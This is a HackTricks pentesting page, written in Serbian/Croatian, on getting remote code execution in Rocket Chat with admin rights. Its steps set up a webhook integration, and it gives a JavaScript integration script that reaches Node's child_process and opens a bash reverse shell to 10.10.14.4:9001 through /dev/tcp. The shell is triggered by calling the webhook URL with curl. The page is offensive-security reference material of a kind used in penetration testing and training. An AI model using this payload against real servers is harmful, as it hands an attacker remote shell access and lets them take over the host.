hacktricks/network-services-pentesting/pentesting-web/rocket-chat.md

4 KiB

Rocket Chat

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

{% embed url="https://websec.nl/" %}

RCE

Ako ste admin unutar Rocket Chat-a, možete dobiti RCE.

  • Idite na Integrations i izaberite New Integration i odaberite bilo koju: Incoming WebHook ili Outgoing WebHook.
  • /admin/integrations/incoming
const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
  • Konfigurišite WebHook (kanal i post kao korisničko ime moraju postojati):
  • Konfigurišite WebHook skriptu:
  • Sačuvajte promene
  • Dobijte generisani WebHook URL:
  • Pozovite ga sa curl i trebali biste primiti rev shell

{% embed url="https://websec.nl/" %}

{% hint style="success" %} Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Podržite HackTricks
{% endhint %}